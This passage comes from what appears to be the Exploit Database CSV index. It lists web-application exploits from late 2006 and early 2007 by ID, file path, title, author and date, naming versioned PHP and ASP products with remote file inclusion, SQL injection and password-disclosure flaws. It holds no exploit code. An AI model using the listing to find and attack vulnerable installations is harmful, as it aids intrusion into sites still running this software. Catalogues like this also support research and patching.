'ldap.php' Remote File Inclusion",2006-12-14,DeltahackingTEAM,php,webapps, -2931,exploits/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,php,webapps, -2937,exploits/php/webapps/2937.php,"extreme-fusion 4.02 - Remote Code Execution",2006-12-16,Kacper,php,webapps, -2938,exploits/php/webapps/2938.html,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin",2006-12-16,H0tTurk-,php,webapps, -2939,exploits/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,php,webapps, -2940,exploits/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps, -2941,exploits/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote File Inclusion",2006-12-16,ajann,php,webapps, -2943,exploits/php/webapps/2943.txt,"Azucar CMS 1.3 - '/admin/index_sitios.php' File Inclusion",2006-12-18,nuffsaid,php,webapps, -2944,exploits/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps, -2945,exploits/php/webapps/2945.txt,"Uploader & Downloader 3.0 - 'id_user' SQL Injection",2006-12-18,"the master",php,webapps, -2948,exploits/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps, -2953,exploits/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection",2006-12-19,rgod,php,webapps, -2955,exploits/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps, -2956,exploits/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusions",2006-12-19,nuffsaid,php,webapps, -2957,exploits/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps, -2958,exploits/php/webapps/2958.txt,"cwmVote 1.0 - 'archive.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps, -2960,exploits/php/webapps/2960.pl,"cwmCounter 5.1.1 - 'statistic.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps, -2962,exploits/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps, -2963,exploits/asp/webapps/2963.txt,"cwmExplorer 1.0 - 'show_file' Source Code Disclosure",2006-12-19,ajann,asp,webapps, -2964,exploits/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,php,webapps, -2965,exploits/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,php,webapps, -2968,exploits/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure",2006-12-20,Kacper,php,webapps, -2969,exploits/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - 'htm2PHP.php' File Disclosure",2006-12-21,"the master",php,webapps, -2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps, -2971,exploits/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusions",2006-12-21,nuffsaid,php,webapps, -2973,exploits/php/webapps/2973.txt,"PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion",2006-12-21,nuffsaid,php,webapps, -2975,exploits/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps, -2976,exploits/php/webapps/2976.txt,"inertianews 0.02b - 'inertianews_main.php' Remote File Inclusion",2006-12-21,bd0rk,php,webapps, -2977,exploits/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps, -2979,exploits/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,php,webapps, -2980,exploits/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - '/admin/auth.php' Remote File Inclusion",2006-12-22,mdx,php,webapps, -2981,exploits/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps, -2982,exploits/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps, -2983,exploits/php/webapps/2983.txt,"b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion",2006-12-23,mdx,php,webapps, -2984,exploits/php/webapps/2984.txt,"SH-News 0.93 - 'misc.php' Remote File Inclusion",2006-12-23,bd0rk,php,webapps, -2986,exploits/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - 'subLevel2.asp' SQL Injection",2006-12-23,ajann,asp,webapps, -2987,exploits/asp/webapps/2987.txt,"Enthrallweb eHomes 1.0 - Multiple (SQL Injection / Cross-Site Scripting) Vulnerabilities",2006-12-23,ajann,asp,webapps, -2988,exploits/asp/webapps/2988.pl,"Enthrallweb eJobs - 'newsdetail.asp' SQL Injection",2006-12-23,ajann,asp,webapps, -2989,exploits/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,asp,webapps, -2990,exploits/asp/webapps/2990.pl,"Enthrallweb emates 1.0 - 'newsdetail.asp' SQL Injection",2006-12-23,ajann,asp,webapps, -2991,exploits/asp/webapps/2991.pl,"Enthrallweb ePages - 'actualpic.asp' SQL Injection",2006-12-23,ajann,asp,webapps, -2992,exploits/asp/webapps/2992.txt,"Dragon Business Directory 3.01.12 - 'ID' SQL Injection",2006-12-23,ajann,asp,webapps, -2993,exploits/asp/webapps/2993.txt,"Calendar MX BASIC 1.0.2 - 'ID' SQL Injection",2006-12-23,ajann,asp,webapps, -2994,exploits/asp/webapps/2994.html,"Enthrallweb eClassifieds 1.0 - Remote User Pass Change",2006-12-23,ajann,asp,webapps, -2995,exploits/asp/webapps/2995.html,"Enthrallweb eCoupons 1.0 - 'myprofile.asp' Remote Pass Change",2006-12-23,ajann,asp,webapps, -2996,exploits/asp/webapps/2996.html,"Enthrallweb eNews 1.0 - Remote User Pass Change",2006-12-23,ajann,asp,webapps, -2997,exploits/asp/webapps/2997.pl,"File Upload Manager 1.0.6 - 'detail.asp' SQL Injection",2006-12-24,ajann,asp,webapps, -2998,exploits/asp/webapps/2998.pl,"NewsLetter MX 1.0.2 - 'ID' SQL Injection",2006-12-24,ajann,asp,webapps, -2999,exploits/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - '/chat/login.php' Code Execution",2006-12-24,nuffsaid,php,webapps, -3000,exploits/php/webapps/3000.pl,"Pagetool CMS 1.07 - 'pt_upload.php' Remote File Inclusion",2006-12-24,g00ns,php,webapps, -3001,exploits/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - 'agent' SQL Injection",2006-12-24,ajann,asp,webapps, -3002,exploits/php/webapps/3002.php,"HLStats 1.34 - 'hlstats.php' SQL Injection",2006-12-25,"Michael Brooks",php,webapps, -3003,exploits/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps, -3004,exploits/php/webapps/3004.txt,"eNdonesia 8.4 - '/mod.php/friend.php/admin.php' Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps, -3005,exploits/php/webapps/3005.pl,"MTCMS 2.0 - '/admin/admin_settings.php' Remote File Inclusion",2006-12-25,nuffsaid,php,webapps, -3006,exploits/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps, -3007,exploits/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps, -3008,exploits/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - 'path' Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps, -3009,exploits/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - 'mod_root' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps, -3010,exploits/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps, -3011,exploits/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account",2006-12-25,"James Gray",php,webapps, -3012,exploits/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - 'ataturk.php' Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps, -3014,exploits/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps, -3015,exploits/asp/webapps/3015.pl,"The Classified Ad System 1.0 - 'main' SQL Injection",2006-12-26,ajann,asp,webapps, -3016,exploits/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection",2006-12-26,DarkFig,php,webapps, -3017,exploits/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps, -3018,exploits/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps, -3019,exploits/php/webapps/3019.txt,"myPHPCalendar 10192000b - 'cal_dir' Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps, -3020,exploits/php/webapps/3020.pl,"PHP-Update 2.7 - '/admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps, -3025,exploits/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.phppath' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps, -3026,exploits/php/webapps/3026.txt,"Bubla 1.0.0rc2 - '/bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps, -3027,exploits/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusions",2006-12-27,Mr-m07,php,webapps, -3028,exploits/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps, -3029,exploits/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php?popen()' Remote Injection",2006-12-27,rgod,php,webapps, -3031,exploits/asp/webapps/3031.txt,"aFAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection",2006-12-28,ajann,asp,webapps, -3032,exploits/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps, -3033,exploits/php/webapps/3033.txt,"phpBB2 Plus 1.53 - Acronym Mod SQL Injection",2006-12-28,"the master",php,webapps, -3035,exploits/asp/webapps/3035.txt,"ASPTicker 1.0 - Authentication Bypass",2006-12-28,ajann,asp,webapps, -3036,exploits/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,php,webapps, -3039,exploits/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,php,webapps, -3043,exploits/php/webapps/3043.txt,"x-news 1.1 - 'users.txt' Remote Password Disclosure",2006-12-30,bd0rk,php,webapps, -3044,exploits/php/webapps/3044.txt,"Voodoo chat 1.0RC1b - 'users.dat' Password Disclosure",2006-12-30,bd0rk,php,webapps, -3045,exploits/php/webapps/3045.php,"Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin",2006-12-30,rgod,php,webapps, -3046,exploits/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - 'viewsrc.asp' Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps, -3047,exploits/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - 'user.dat' Password Disclosure",2006-12-30,bd0rk,php,webapps, -3048,exploits/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - 'key' SQL Injection",2006-12-30,ajann,asp,webapps, -3049,exploits/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script",2006-12-30,Kacper,php,webapps, -3050,exploits/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps, -3051,exploits/php/webapps/3051.txt,"WordPress Plugin Enigma 2 Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps, -3053,exploits/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps, -3054,exploits/php/webapps/3054.txt,"P-News 1.16/1.17 - 'user.dat' Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps, -3057,exploits/php/webapps/3057.php,"MDForum 2.0.1 - 'PNSVlang' Remote Code Execution",2006-12-31,Kacper,php,webapps, -3059,exploits/php/webapps/3059.txt,"Bubla 0.9.2 - 'bu_dir' Multiple Remote File Inclusions",2006-12-31,DeltahackingTEAM,php,webapps, -3060,exploits/asp/webapps/3060.txt,"RBlog 1.0 - 'admin.mdb' Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps, -3061,exploits/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp?id' SQL Injection",2007-01-01,chernobiLe,asp,webapps, -3062,exploits/asp/webapps/3062.txt,"AutoDealer 2.0 - 'detail.asp?iPro' SQL Injection",2007-01-01,ajann,asp,webapps, -3065,exploits/cgi/webapps/3065.txt,"WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps, -3066,exploits/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps, -3068,exploits/asp/webapps/3068.html,"TaskTracker 1.5 - 'Customize.asp' Remote Add Administrator",2007-01-01,ajann,asp,webapps, -3073,exploits/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - 'subcatID' SQL Injection",2007-01-03,ajann,asp,webapps, -3074,exploits/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps, -3075,exploits/php/webapps/3075.pl,"VerliAdmin 0.3 - 'language.php' Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps, -3076,exploits/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps, -3079,exploits/php/webapps/3079.txt,"Aratix 0.2.2b11 - '/inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps, -3081,exploits/asp/webapps/3081.pl,"DigiRez 3.4 - 'book_id' SQL Injection",2007-01-04,ajann,asp,webapps, -3082,exploits/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php?id' SQL Injection",2007-01-05,"Michael Brooks",php,webapps, -3083,exploits/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps, -3085,exploits/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps, -3089,exploits/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps, -3090,exploits/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusions",2007-01-06,"Mehmet Ince",php,webapps, -3091,exploits/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps, -3093,exploits/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Remote File Inclusion",2007-01-07,beks,php,webapps, -3095,exploits/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps, -3096,exploits/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps, -3097,exploits/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,php,webapps, -3100,exploits/php/webapps/3100.txt,"Magic Photo Storage Website - '_config[site_path]' File Inclusion",2007-01-08,k1tk4t,php,webapps, -3103,exploits/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution",2007-01-08,DarkFig,php,webapps, -3104,exploits/php/webapps/3104.txt,"PPC Search Engine 1.61 - 'INC' Multiple Remote File Inclusions",2007-01-09,IbnuSina,php,webapps, -3105,exploits/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps, -3106,exploits/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,php,webapps, -3108,exploits/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,php,webapps, -3109,exploits/php/webapps/3109.php,"WordPress 2.0.6 - 'wp-trackback.php' SQL Injection",2007-01-10,rgod,php,webapps, -3113,exploits/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,php,webapps, -3114,exploits/php/webapps/3114.txt,"Article System 0.1 - 'INCLUDE_DIR' Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps, -3115,exploits/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting",2007-01-11,ajann,asp,webapps, -3116,exploits/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,php,webapps, -3117,exploits/php/webapps/3117.txt,"LunarPoll 1.0 - 'show.php?PollDir' Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps, -3118,exploits/php/webapps/3118.txt,"TLM CMS 1.1 - 'i-accueil.php?chemin' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps, -3120,exploits/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - 'duyuru.asp?id' SQL Injection",2007-01-12,chernobiLe,php,webapps, -3121,exploits/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps, -3122,exploits/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' SQL Injection",2007-01-13,ajann,asp,webapps, -3123,exploits/php/webapps/3123.html,"FdWeB Espace Membre 2.01 - 'path' Remote File Inclusion",2007-01-13,ajann,php,webapps, -3124,exploits/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps, -3125,exploits/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps, -3134,exploits/php/webapps/3134.php,"KGB 1.9 - 'sesskglogadmin.php' Local File Inclusion",2007-01-15,Kacper,php,webapps, -3135,exploits/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps, -3141,exploits/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php?id' SQL Injection",2007-01-17,SlimTim10,php,webapps, -3143,exploits/php/webapps/3143.php,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)",2007-01-17,"silent vapor",php,webapps, -3144,exploits/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)",2007-01-17,trew,php,webapps, -3145,exploits/php/webapps/3145.txt,"PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps, -3146,exploits/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)",2007-01-17,666,php,webapps, -3147,exploits/php/webapps/3147.txt,"Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion",2007-01-17,GoLd_M,php,webapps, -3150,exploits/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - '/lang/index.php' Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps, -3152,exploits/php/webapps/3152.txt,"ComVironment 4.0 - 'grab_globals.lib.php' Remote File Inclusion",2007-01-18,GoLd_M,php,webapps, -3153,exploits/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,php,webapps, -3161,exploits/php/webapps/3161.txt,"PHPSherpa - '/include/config.inc.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps, -3162,exploits/php/webapps/3162.txt,"Bradabra 2.0.5 - '/include/includes.php' Remote File Inclusion",2007-01-20,GoLd_M,php,webapps, -3163,exploits/php/webapps/3163.txt,"Neon Labs Website 3.2 - 'nl.php?g_strRootDir' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps, -3164,exploits/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - 'config.php' Remote File Inclusion",2007-01-20,DeltahackingTEAM,php,webapps, -3165,exploits/php/webapps/3165.txt,"MySpeach 2.1b - 'up.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps, -3169,exploits/php/webapps/3169.txt,"WebChat 0.77 - 'defines.php?WEBCHATPATH' Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps, -3171,exploits/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - 'index.php?gen' Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps, -3172,exploits/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps, -3174,exploits/php/webapps/3174.txt,"Upload Service 1.0 - 'top.php?maindir' Remote File Inclusion",2007-01-21,y3dips,php,webapps, -3175,exploits/php/webapps/3175.pl,"VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion",2007-01-22,bd0rk,php,webapps, -3180,exploits/php/webapps/3180.pl,"Vote-Pro 4.0 - 'poll_frame.php?poll_id' Remote Code Execution",2007-01-23,r0ut3r,php,webapps, -3183,exploits/php/webapps/3183.txt,"BBClone 0.31 - 'selectlang.php' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps, -3184,exploits/php/webapps/3184.txt,"phpXD 0.3 - 'path' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps, -3185,exploits/php/webapps/3185.txt,"RPW 1.0.2 - 'config.php?sql_language' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps, -3186,exploits/asp/webapps/3186.txt,"ASP EDGE 1.2b - 'user.asp' SQL Injection",2007-01-24,ajann,asp,webapps, -3187,exploits/asp/webapps/3187.txt,"ASP NEWS 3.0 - 'news_detail.asp' SQL Injection",2007-01-24,ajann,asp,webapps, -3191,exploits/php/webapps/3191.txt,"vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps, -3192,exploits/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps, -3194,exploits/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps, -3195,exploits/asp/webapps/3195.txt,"GPS CMS 1.2 - 'print.asp' SQL Injection",2007-01-25,ajann,asp,webapps, -3196,exploits/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps, -3197,exploits/asp/webapps/3197.txt,"forum livre 1.0 - SQL Injection / Cross-Site Scripting",2007-01-25,ajann,asp,webapps, -3198,exploits/php/webapps/3198.txt,"Virtual Path 1.0 - '/vp/configure.php' Remote File Inclusion",2007-01-25,GoLd_M,php,webapps, -3201,exploits/php/webapps/3201.txt,"MyPHPcommander 2.0 - 'package.php' Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps, -3202,exploits/php/webapps/3202.txt,"AINS 0.02b - 'ains_main.php?ains_path' Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps, -3203,exploits/php/webapps/3203.txt,"FD Script 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,php,webapps, -3205,exploits/php/webapps/3205.txt,"nsGalPHP - '/includes/config.inc.php?racineTBS' Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps, -3206,exploits/php/webapps/3206.txt,"ACGVclick 0.2.0 - 'path' Remote File Inclusion",2007-01-27,ajann,php,webapps, -3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,php,webapps, -3208,exploits/php/webapps/3208.txt,"ACGVannu 1.3 - 'index2.php' Remote User Pass Change",2007-01-27,ajann,php,webapps, -3209,exploits/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion",2007-01-27,"ThE dE@Th",php,webapps, -3210,exploits/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - 'default.asp' SQL Injection",2007-01-27,ajann,asp,webapps, -3212,exploits/php/webapps/3212.txt,"PHPMyReports 3.0.11 - 'lib_head.php' Remote File Inclusion",2007-01-27,GoLd_M,php,webapps, -3214,exploits/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps, -3215,exploits/php/webapps/3215.pl,"Foro Domus 2.10 - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps, -3216,exploits/php/webapps/3216.txt,"xNews 1.3 - 'xNews.php' SQL Injection",2007-01-28,ajann,php,webapps, -3217,exploits/php/webapps/3217.txt,"PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps, -3221,exploits/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution",2007-01-29,rgod,php,webapps, -3222,exploits/php/webapps/3222.txt,"Webfwlog 0.92 - 'debug.php' Remote File Disclosure",2007-01-29,GoLd_M,php,webapps, -3225,exploits/php/webapps/3225.pl,"Galeria Zdjec 3.0 - 'zd_numer.php' Local File Inclusion",2007-01-30,ajann,php,webapps, -3226,exploits/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,php,webapps, -3227,exploits/php/webapps/3227.txt,"CascadianFAQ 4.1 - 'index.php' SQL Injection",2007-01-30,ajann,php,webapps, -3228,exploits/php/webapps/3228.txt,"MyNews 4.2.2 - 'themefunc.php' Remote File Inclusion",2007-01-30,GoLd_M,php,webapps, -3231,exploits/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps, -3232,exploits/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps, -3233,exploits/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - 'tr' SQL Injection",2007-01-31,cl24zy,asp,webapps, -3234,exploits/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection",2007-01-31,ajann,php,webapps, -3235,exploits/php/webapps/3235.txt,"phpBB Tweaked 3 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps, -3236,exploits/php/webapps/3236.txt,"Hailboards 1.2.0 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps, -3237,exploits/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,php,webapps, -3238,exploits/php/webapps/3238.txt,"PHPMyRing 4.1.3b - 'fichier' Remote File Inclusion",2007-01-31,ajann,php,webapps, -3239,exploits/php/webapps/3239.html,"Extcalendar 2 - 'profile.php' Remote User Pass Change",2007-01-31,ajann,php,webapps, -3240,exploits/php/webapps/3240.txt,"JV2 Folder Gallery 3.0 - Remote File Inclusion",2007-01-31,"ThE dE@Th",php,webapps, -3241,exploits/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti - 'tr' SQL Injection",2007-01-31,cl24zy,asp,webapps, -3242,exploits/php/webapps/3242.txt,"Omegaboard 1.0beta4 - 'functions.php' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps, -3243,exploits/php/webapps/3243.txt,"Cerulean Portal System 0.7b - Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps, -3245,exploits/php/webapps/3245.txt,"SIPS 0.3.1 - 'box.inc.php' Remote File Inclusion",2007-02-01,ajann,php,webapps, -3246,exploits/php/webapps/3246.txt,"phpEventMan 1.0.2 - 'level' Remote File Inclusion",2007-02-01,"Mehmet Ince",php,webapps, -3247,exploits/php/webapps/3247.txt,"Epistemon 1.0 - 'common.php?inc_path' Remote File Inclusion",2007-02-01,GoLd_M,php,webapps, -3249,exploits/php/webapps/3249.txt,"WebBuilder 2.0 - 'StageLoader.php' Remote File Inclusion",2007-02-01,GoLd_M,php,webapps, -3250,exploits/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion",2007-02-01,"laurent gaffié",php,webapps, -3251,exploits/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps, -3252,exploits/php/webapps/3252.txt,"EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup",2007-02-02,Eight10,php,webapps, -3253,exploits/php/webapps/3253.txt,"Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps, -3255,exploits/php/webapps/3255.php,"F3Site 2.1 - Remote Code 